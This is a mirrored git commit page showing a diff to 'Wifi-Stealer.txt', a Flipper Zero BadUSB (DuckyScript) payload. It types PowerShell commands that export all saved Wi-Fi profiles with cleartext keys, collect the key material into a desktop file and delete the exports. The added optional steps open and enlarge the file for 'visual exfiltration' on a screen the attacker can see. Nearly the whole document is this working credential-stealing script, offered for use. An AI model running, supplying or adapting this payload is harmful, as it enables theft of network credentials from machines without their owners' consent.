mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-22 05:30:14 +00:00
Merge pull request #24 from 7h30th3r0n3/patch-1
Update Wifi-Stealer.txt
This commit is contained in:
commit
1b50c44357
@ -1,13 +1,31 @@
|
|||||||
REM Title: Wifi Stealer
|
REM Title: Wifi Stealer
|
||||||
REM Author: 7h30th3r0n3
|
REM Author: 7h30th3r0n3
|
||||||
REM Target: Tested on Windows 7/8/10/11
|
REM Target: Tested on Windows 7/8/10/11
|
||||||
REM Version: 1.0
|
REM Version: 1.1
|
||||||
REM Category: Grabber
|
REM Category: Grabber
|
||||||
REM Extract SSID and wifi shared key and place it in a txt file nammed 0.txt on the desktop
|
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop, then it opens the file and zooms in
|
||||||
|
REM Designed to be used for mouse hijacking on a machine whose screen is visible
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 300
|
DELAY 500
|
||||||
STRING powershell
|
STRING powershell
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 300
|
DELAY 500
|
||||||
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
||||||
ENTER
|
ENTER
|
||||||
|
REM If you want to zoom pop-up at the end for visual exfiltration replace "REMoption1" with nothing
|
||||||
|
REMoption1 GUI m
|
||||||
|
REMoption1 DELAY 4000
|
||||||
|
REMoption1 STRING 0
|
||||||
|
REMoption1 DELAY 100
|
||||||
|
REMoption1 ENTER
|
||||||
|
REMoption1 DELAY 200
|
||||||
|
REMoption1 GUI UPARROW
|
||||||
|
REMoption1 DELAY 100
|
||||||
|
REMoption1 CTRL =
|
||||||
|
REMoption1 CTRL =
|
||||||
|
REMoption1 CTRL =
|
||||||
|
REMoption1 CTRL =
|
||||||
|
REMoption1 CTRL =
|
||||||
|
REMoption1 DELAY 10000
|
||||||
|
REMoption1 ALT F4
|
||||||
|
REMoption1 CTRL D
|
||||||
|
Loading…
Reference in New Issue
Block a user